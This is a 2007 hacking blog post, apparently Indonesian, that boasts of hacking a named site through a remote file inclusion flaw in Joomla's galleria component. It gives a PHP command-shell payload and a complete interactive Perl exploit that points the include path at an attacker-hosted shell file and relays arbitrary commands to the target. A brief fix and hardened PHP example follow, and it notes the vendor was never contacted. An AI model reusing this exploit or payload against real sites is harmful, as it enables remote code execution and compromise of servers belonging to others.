LaGiPusHinGWitH ----- IT

About This Site

Information technology is very important for supporting the advancement of science, in Indonesia in particular. All of this must be backed by skills that keep pace with the technology itself, especially for IT practitioners. In closing, "Happy creating" to all of us. koy^k^guy^ - Owner

Wednesday, August 22, 2007
Hacked mercubuana-it.org with (Joomla) Remote File Inclusion

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Joomla is free software written in PHP and released under the GNU GPL licence.

##########################################
# galleria - A Picture Gallery #
# Copyright (C) 2004 #
# Homepage : http://www.binarydigit.at #
# Email : office@binarydigit.at #
# Version : 1.0 #
# License : GNU GPL Public License #
##########################################

-------------------------------------------------------

The vulnerability is in the gallery module.

Proof of Concept:
~~~~~~~~~~~~~~~
Vulnerable script: galleria.php in the modules/galleria folder.

---------------galleria.php--------------------------------

include_once($mosConfig_absolute_path."/components/com_galleria/galleria.html.php");
include_once($mosConfig_absolute_path."/components/com_galleria/config.galleria.php");
include_once($mosConfig_absolute_path."/administrator/components/com_galleria/class.galleria.php");

html_galleria::show_header( $option, $Itemid );

switch( $task )
{
    case 'show_rubriks':
        show_rubriks ( $option, $Itemid );
        break;

...
---------------------------------------------------------

The variable $mosConfig_absolute_path is not sanitized.
When register_globals=on and allow_url_fopen=on, an attacker can exploit this weakness
by injecting a PHP script.

Poc/Exploit:
~~~~~~~~~~~

dir.txt
<?
echo "".passthru(' ls -la ; id ')."";
?>

Perl Exploit:
~~~~~~~~~~~

#!/usr/bin/perl
##
# Joomla Remote Code Execution Exploit
# Bug Found & code By roninmorgue
# code reference from K-159 & uid0/zod at ExploiterCode.com
##
# usage:
# perl joomla.pl <target> <cmd shell location> <cmd shell variable>
# perl joomla http://target.com/ http://attacker.com/cmd.txt cmd
# cmd shell example: <?passthru($_GET[cmd]);?>
# cmd shell variable: ($_GET[cmd]);
##
# Contact: roninmorgue@yahoo.co.id || http://www.forum.mercubuana-it.org
##

use LWP::UserAgent;

$Directory = $ARGV[0];
$DirectoryCommand = $ARGV[1];
$command = $ARGV[2];

if($Directory!~/http:\/\// || $DirectoryCommand!~/http:\/\// || !$command){usage()}

head();

while()
{
    print "[shell] \$";
    while(<STDIN>)
    {
        $cmdshell=$_;
        chomp($cmdshell);

        $exploit = LWP::UserAgent->new() or die;
        $req = HTTP::Request->new(GET=>$Directory.'/components/com_galleria/galleria.php?mosConfig_absolute_path='.$DirectoryCommand.'?&'.$command.'='.$cmdshell)
            or die "\nCould Not connect\n";

        $res = $exploit->request($req);
        $return = $res->content;
        $return =~ tr/[\n]/[ê]/;

        if (!$cmdshell) {print "\nPlease Enter a Command\n\n"; $return ="";}

        elsif ($return =~/failed to open stream: HTTP request failed!/ ||
               $return =~/: Cannot execute a blank command in <b>/)
        {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
        elsif ($return =~/^<br.\>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}

        if($return =~ /(.*)/)
        {
            $finreturn = $1;
            $finreturn=~ tr/[ê]/[\n]/;
            print "\r\n$finreturn\n\r";
            last;
        }
        else {print "[shell] \$";}
    }
}
last;

sub head()
{
    print "\n===================================================\r\n";
    print " *Joomla Remote File Inclusion*\r\n";
    print "=====================================================\r\n";
}

sub usage()
{
    head();
    print " Usage: perl joomla.pl <target> <cmd shell location> <cmd shell variable>\r\n\n";
    print " <Site> - Full path to Joomla site ex: http://www.site.com/ \r\n";
    print " <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n";
    print " <cmd variable> - Command variable used in php shell \r\n";
    print "=====================================================\r\n";
    print " Bug Found by roninmorgue \r\n";
    print " Contact: roninmorgue\@yahoo.co.id || http://www.forum.mercubuana-it.org \r\n";
    print "=====================================================\r\n";
    exit();
}

-------------------------------------------------------
Solution/The Fix:
~~~~~~~~~~~~~~

Disable or delete the galleria module.
Sanitize the script in galleria.php to prevent this vulnerability.
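
One way to apply the sanitization described above, as an added example that is not the component's own code or a vendor patch. It assumes Joomla 1.0's convention of defining the `_VALID_MOS` constant in its index.php before a component is loaded; `galleria_local_base()` is a hypothetical helper name.

```php
<?php
// Added example: hardened top of components/com_galleria/galleria.php.

// 1. Refuse direct requests. Assumption: Joomla 1.0's index.php defines
//    _VALID_MOS before loading a component, so a request made straight to
//    this file stops here, before any include runs.
defined('_VALID_MOS') or die('Direct access to this location is not allowed.');

// 2. Defence in depth for register_globals=on: the base path must never be
//    taken from request data.
foreach (array($_GET, $_POST, $_COOKIE) as $source) {
    if (array_key_exists('mosConfig_absolute_path', $source)) {
        die('Request rejected.');
    }
}

// 3. Accept the base path only if it resolves to an existing local directory.
//    (galleria_local_base is a hypothetical helper, not part of Joomla.)
function galleria_local_base($path)
{
    // realpath('') resolves to the current directory, so reject empty input.
    if (!is_string($path) || $path === '' || strpos($path, '://') !== false) {
        return false;
    }
    $real = realpath($path);
    return ($real !== false && is_dir($real)) ? $real : false;
}

$base = galleria_local_base(isset($mosConfig_absolute_path) ? $mosConfig_absolute_path : '');
if ($base === false) {
    die('Invalid configuration path.');
}

include_once($base . '/components/com_galleria/galleria.html.php');
include_once($base . '/components/com_galleria/config.galleria.php');
include_once($base . '/administrator/components/com_galleria/class.galleria.php');

// Server-side settings that remove the preconditions named above (php.ini):
//   register_globals  = Off
//   allow_url_fopen   = Off
//   allow_url_include = Off   (available from PHP 5.2.0)
```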

Notification:
~~~~~~~~~~~

The vendor has not been contacted.

Posted by roninmorgue on 08/22 at 08:42 PM